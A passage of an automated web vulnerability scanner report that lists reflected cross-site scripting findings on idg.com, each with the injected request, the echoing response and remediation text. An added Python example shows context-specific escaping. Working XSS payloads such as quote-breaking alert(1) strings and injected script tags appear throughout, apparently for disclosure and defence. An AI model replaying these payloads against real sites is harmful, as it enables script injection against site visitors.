...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/typeforme35de";134e9857aa3");
} catch(err) {}</script>
...[SNIP]...

2.246. http://idg.com/www/idgproducts.nsf/typeform [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/idgproducts.nsf/typeform

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1831"-alert(1)-"b301e0f9a7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/typeform?a1831"-alert(1)-"b301e0f9a7f=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5029
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/typeform?a1831"-alert(1)-"b301e0f9a7f=1");
} catch(err) {}</script>
...[SNIP]...

2.247. http://idg.com/www/media.nsf/MRBydate [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/media.nsf/MRBydate

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f478e"%3b38f4571d878 was submitted in the REST URL parameter 1. This input was echoed as f478e";38f4571d878 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwf478e"%3b38f4571d878/media.nsf/MRBydate HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:09 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5010
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwf478e";38f4571d878/media.nsf/MRBydate");
} catch(err) {}</script>
...[SNIP]...

2.248. http://idg.com/www/media.nsf/MRBydate [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/media.nsf/MRBydate

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98f73"%3b4cbc64418be was submitted in the REST URL parameter 3. This input was echoed as 98f73";4cbc64418be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/media.nsf/MRBydate98f73"%3b4cbc64418be HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:09 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5010
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/media.nsf/MRBydate98f73";4cbc64418be");
} catch(err) {}</script>
...[SNIP]...

2.249. http://idg.com/www/media.nsf/MRBydate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/media.nsf/MRBydate

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdc88"-alert(1)-"d900323b254 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/media.nsf/MRBydate?fdc88"-alert(1)-"d900323b254=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:08 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5023
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/media.nsf/MRBydate?fdc88"-alert(1)-"d900323b254=1");
} catch(err) {}</script>
...[SNIP]...

2.250. http://idg.com/www/media.nsf/MRBydate [readform parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/media.nsf/MRBydate

Issue detail

The value of the readform request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7113"-alert(1)-"051b7f0b7c4 was submitted in the readform parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/media.nsf/MRBydate?readforma7113"-alert(1)-"051b7f0b7c4 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:16 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5029
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/media.nsf/MRBydate?readforma7113"-alert(1)-"051b7f0b7c4");
} catch(err) {}</script>
...[SNIP]...

2.251. http://idg.com/www/pr.nsf/PressHome [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/pr.nsf/PressHome

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 860ea"%3b94e098012aa was submitted in the REST URL parameter 1. This input was echoed as 860ea";94e098012aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www860ea"%3b94e098012aa/pr.nsf/PressHome HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:00 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5008
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www860ea";94e098012aa/pr.nsf/PressHome");
} catch(err) {}</script>
...[SNIP]...

2.252. http://idg.com/www/pr.nsf/PressHome [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/pr.nsf/PressHome

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec156"%3b6164df56710 was submitted in the REST URL parameter 3. This input was echoed as ec156";6164df56710 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/pr.nsf/PressHomeec156"%3b6164df56710 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:06 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5008
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/PressHomeec156";6164df56710");
} catch(err) {}</script>
...[SNIP]...

2.253. http://idg.com/www/pr.nsf/PressHome [ReadForm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/pr.nsf/PressHome

Issue detail

The value of the ReadForm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a6b2"-alert(1)-"28eeed432fc was submitted in the ReadForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/pr.nsf/PressHome?ReadForm3a6b2"-alert(1)-"28eeed432fc HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:19 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/PressHome?ReadForm3a6b2"-alert(1)-"28eeed432fc");
} catch(err) {}</script>
...[SNIP]...

2.254. http://idg.com/www/pr.nsf/PressHome [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/pr.nsf/PressHome

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9be16"><script>alert(1)</script>657b62b0feb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www/pr.nsf/PressHome?ReadForm&9be16"><script>alert(1)</script>657b62b0feb=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:20 GMT
Connection: close
Last-Modified: Thu, 16 Dec 2010 13:01:18 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 12853
Cache-control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IDG.com: Press Room
...[SNIP]...
<input name="QUERY_STRING" id="QUERY_STRING" type="hidden" value="ReadForm&9be16"><script>alert(1)</script>657b62b0feb=1">
...[SNIP]...
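Issues 2.253 and 2.254 show the same user-controlled string landing in two different sinks on idg.com: a double-quoted JavaScript string literal inside the Google Analytics _trackPageview call, and a double-quoted HTML attribute on the hidden QUERY_STRING input. The remediation text above says to avoid the script context; where that is not possible the fix is an encoder matched to each sink. The following is an added example, not code from the report or from the affected site. The two template strings are reconstructed from the response snippets above and the payloads are the ones the scanner submitted; the break-out checks mirror what the scanner's "echoed unmodified" verdict means for each context.

```python
"""Context-matched output encoding for the two idg.com sinks in issues 2.253
and 2.254: a double-quoted JS string literal inside a <script> block and a
double-quoted HTML attribute.  Added example; not code from the report or the
site.  Templates are reconstructed from the report's response snippets."""

import html
import re

# Payloads exactly as submitted in issues 2.253 and 2.254.
JS_PAYLOAD = '/www/pr.nsf/PressHome?ReadForm3a6b2"-alert(1)-"28eeed432fc'
ATTR_PAYLOAD = 'ReadForm&9be16"><script>alert(1)</script>657b62b0feb=1'

# Templates reconstructed from the report's response bodies.
GA_TEMPLATE = 'pageTracker._trackPageview("IDG.com - Page not found - {path}");'
INPUT_TEMPLATE = ('<input name="QUERY_STRING" id="QUERY_STRING" type="hidden" '
                  'value="{qs}">')

# Anything outside this allow-list is hex-escaped for the JS string context.
# That covers both quote characters, the backslash, line terminators
# (including U+2028/U+2029, which end a JS string literal just like \n),
# and '<' and '/' so that a literal "</script>" can never be assembled.
_JS_UNSAFE = re.compile(r'[^A-Za-z0-9 ,._-]')


def js_string_escape(value: str) -> str:
    """Escape VALUE for use inside a quoted JavaScript string literal that is
    itself embedded in an HTML <script> block."""
    def repl(m):
        cp = ord(m.group(0))
        if cp < 0x100:
            return f'\\x{cp:02x}'
        if cp <= 0xFFFF:
            return f'\\u{cp:04x}'
        hi, lo = divmod(cp - 0x10000, 0x400)          # UTF-16 surrogate pair
        return f'\\u{0xD800 + hi:04x}\\u{0xDC00 + lo:04x}'
    return _JS_UNSAFE.sub(repl, value)


def html_attr_escape(value: str) -> str:
    """Escape VALUE for a double-quoted HTML attribute value."""
    return html.escape(value, quote=True)   # & < > " ' become entities


def render_vulnerable(path: str, qs: str) -> tuple:
    """What the report shows: raw concatenation into both sinks."""
    return GA_TEMPLATE.format(path=path), INPUT_TEMPLATE.format(qs=qs)


def render_hardened(path: str, qs: str) -> tuple:
    """Same templates, each fed through the encoder for its own context."""
    return (GA_TEMPLATE.format(path=js_string_escape(path)),
            INPUT_TEMPLATE.format(qs=html_attr_escape(qs)))


def js_string_breaks_out(script_line: str) -> bool:
    """True when the literal is terminated early: any unescaped '"' beyond
    the two that delimit the _trackPageview argument."""
    return len(re.findall(r'(?<!\\)"', script_line)) != 2


def attr_breaks_out(tag: str) -> bool:
    """True when the value attribute closes before the end of the tag, i.e.
    the first '"' after value=" is not the tag's own closing delimiter."""
    start = tag.index('value="') + len('value="')
    end = tag.index('"', start)
    return tag[end:] != '">'


if __name__ == '__main__':
    for label, (js, attr) in (('vulnerable', render_vulnerable(JS_PAYLOAD, ATTR_PAYLOAD)),
                              ('hardened', render_hardened(JS_PAYLOAD, ATTR_PAYLOAD))):
        print(f'{label}: js breaks out={js_string_breaks_out(js)}, '
              f'attr breaks out={attr_breaks_out(attr)}')
        print('  ', js)
        print('  ', attr)
```

The allow-list approach is deliberately stricter than escaping only the quote character: a value that is safe for a double-quoted literal is not safe if a developer later moves it into a single-quoted one, and a raw "</script>" inside any JS string ends the script block regardless of quoting. The same two encoders apply to the remaining idg.com findings below, which reflect into the same _trackPageview call and the same hidden input.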

2.255. http://idg.com/www/pr.nsf/PressHome [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/pr.nsf/PressHome

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3278"-alert(1)-"47e0292b7d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/pr.nsf/PressHome?d3278"-alert(1)-"47e0292b7d6=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:00 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5021
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/PressHome?d3278"-alert(1)-"47e0292b7d6=1");
} catch(err) {}</script>
...[SNIP]...

2.256. http://idg.com/www/pr.nsf/prBydate [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/pr.nsf/prBydate

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d77e8"%3be788188be52 was submitted in the REST URL parameter 1. This input was echoed as d77e8";e788188be52 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwd77e8"%3be788188be52/pr.nsf/prBydate?readform HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:17 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwd77e8";e788188be52/pr.nsf/prBydate?readform");
} catch(err) {}</script>
...[SNIP]...

2.257. http://idg.com/www/pr.nsf/prBydate [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/pr.nsf/prBydate

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eef1a"%3bf411ccd2d7e was submitted in the REST URL parameter 3. This input was echoed as eef1a";f411ccd2d7e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/pr.nsf/prBydateeef1a"%3bf411ccd2d7e?readform HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:17 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/prBydateeef1a";f411ccd2d7e?readform");
} catch(err) {}</script>
...[SNIP]...

2.258. http://idg.com/www/pr.nsf/prBydate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/pr.nsf/prBydate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85ef1"><script>alert(1)</script>7048834a351 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www/pr.nsf/prBydate?readform&85ef1"><script>alert(1)</script>7048834a351=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:16 GMT
Connection: close
Last-Modified: Thu, 16 Dec 2010 13:01:14 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23894
Cache-control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IDG.com: Press Room
...[SNIP]...
<input name="QUERY_STRING" id="QUERY_STRING" type="hidden" value="readform&85ef1"><script>alert(1)</script>7048834a351=1">
...[SNIP]...

2.259. http://idg.com/www/pr.nsf/prBydate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/pr.nsf/prBydate

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32037"-alert(1)-"27f782e283e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/pr.nsf/prBydate?32037"-alert(1)-"27f782e283e=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:19 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5020
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/prBydate?32037"-alert(1)-"27f782e283e=1");
} catch(err) {}</script>
...[SNIP]...

2.260. http://idg.com/www/pr.nsf/prBydate [readform parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/pr.nsf/prBydate

Issue detail

The value of the readform request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50749"-alert(1)-"135b6c5479a was submitted in the readform parameter. This input was echoed unmodified in the application's response.

